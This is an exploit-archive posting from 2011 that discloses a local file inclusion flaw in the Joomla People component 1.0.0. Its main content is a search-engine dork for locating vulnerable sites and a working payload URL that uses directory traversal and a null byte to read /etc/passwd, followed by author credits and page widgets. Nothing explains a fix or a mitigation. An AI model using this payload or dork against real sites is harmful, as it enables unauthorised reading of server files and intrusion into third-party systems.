Joomla People Component 1.0.0 Local File Inclusion

2011.01.17
Credit: altbta
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#################################################################### >>>>> Author : altbta [altbta@gmail.com] >>>>> Home : [xp10.com] >>>>> Script : Joomla Component com_people >>>>> Bug Type : Local File Inclusion Vulnerability >>>>> Dork : inurl:"/index.php?option=com_people" >>>>> Vendor : http://www.ptt-solution.com #################################################################### ===[ Exploit ]=== [LFI] http://site/index.php?option=com_people&controller=../../../../../../../../../../../../../../../../../../etc/passwd%00 #################################################################### RxH & ab0-3th4b & MeTo & R3d-D3v!L &* DR_ALWALEED<http://www.xp10.com/xp10/members/178149-DR_ALWALEED>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top